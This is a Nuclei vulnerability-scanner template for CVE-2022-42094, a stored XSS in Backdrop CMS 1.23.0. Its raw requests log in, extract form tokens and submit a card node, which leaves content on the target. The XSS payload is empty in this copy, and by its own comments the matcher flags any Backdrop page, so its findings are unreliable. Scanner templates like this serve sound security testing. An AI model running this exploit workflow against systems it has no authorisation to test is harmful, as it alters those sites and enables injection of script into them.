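# Nuclei template for CVE-2022-42094: authenticated stored XSS in the
# Backdrop CMS 1.23.0 "Card" content type. The four raw requests below log
# in, load the card form and submit it; the internal extractors carry the
# form build ids / token from one response into the next request.
id: CVE-2022-42094

info:
  name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/backdrop/backdrop/releases/tag/1.23.0
    - https://github.com/bypazs/CVE-2022-42094
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42094
    - https://backdropcms.org
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2022-42094
    cwe-id: CWE-79
    epss-score: 0.00567
    epss-percentile: 0.75259
    cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    # One per raw request below; keep in sync if requests are added/removed.
    max-request: 4
    vendor: backdropcms
    product: backdrop
  # 'authenticated': needs the {{username}} / {{password}} template
  # variables. 'intrusive': request 4 creates a card node on the target and
  # nothing in this template removes it afterwards.
  tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms

http:
  - raw:
      # 1. Fetch the login form; form_id_1 is extracted from this response.
      - |
        GET /?q=user/login HTTP/1.1
        Host: {{Hostname}}

      # 2. Log in with the supplied credentials and the extracted build id.
      - |
        POST /?q=user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in

      # 3. Load the card creation form; form_id_2, form_token and name are
      #    extracted from this response.
      - |
        GET /?q=node/add/card HTTP/1.1
        Host: {{Hostname}}

      # 4. Submit the card form. The body[und][0][value] part is empty in
      #    this copy of the template, so as written the request creates a
      #    card titled {{randstr}} with an empty full_html body.
      - |
        POST /?q=node/add/card HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY

        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="title"

        {{randstr}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
        Content-Type: application/octet-stream

        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="field_image[und][0][fid]"

        0
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="field_image[und][0][display]"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="changed"

        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="form_build_id"

        {{form_id_2}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="form_token"

        {{form_token}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="form_id"

        card_node_form
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="body[und][0][value]"

        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="body[und][0][format]"

        full_html
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="status"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="name"

        {{name}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="date[date]"

        2023-04-13
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="date[time]"

        21:49:36
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="path[auto]"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="comment"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="additional_settings__active_tab"

        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="op"

        Save
        ------WebKitFormBoundaryWEcZgRB4detkrGaY--

    host-redirects: true
    matchers-condition: and
    matchers:
      # NOTE(review): the first word entry is empty in this copy. An empty
      # word is contained in every body, so this matcher currently only
      # confirms that a "Backdrop CMS" page came back — expect false
      # positives from any reachable Backdrop install.
      - type: word
        part: body
        words:
          -
          - Backdrop CMS
        condition: and

      - type: status
        status:
          - 200

    # All extractors are internal: their values become dynamic variables for
    # the later raw requests instead of being reported as output. They run
    # against every response, so the last matching response wins (e.g. name
    # is presumably taken from the card form, the last page that has it —
    # confirm against the rendered pages). Lazy quantifiers keep each capture
    # inside its own value="..." attribute instead of running to the last
    # double quote on the line when further attributes follow.
    extractors:
      - type: regex
        name: form_id_1
        group: 1
        regex:
          - 'name="form_build_id" value="(.*?)"'
        internal: true

      - type: regex
        name: name
        group: 1
        regex:
          - 'name="name" value="(.*?)"'
        internal: true

      - type: regex
        name: form_id_2
        group: 1
        regex:
          - 'name="form_build_id" value="(.*?)"'
        internal: true

      - type: regex
        name: form_token
        group: 1
        regex:
          - 'name="form_token" value="(.*?)"'
        internal: true

# The digest below was computed over the original template text. Any edit to
# this file (including the regex changes above) means it will no longer
# verify; re-sign the template before relying on the signature.
# digest: 4a0a004730450221009423d24591a621c265ff58d530db4d6bac38d5a05e11eaee612ba4153004b9f7022038c091f07d28bdf026cceffc6a5bd07ac874afcb51c621ed0738ffe72a5ccda5:922c64590222798bb761d5b6d8e72950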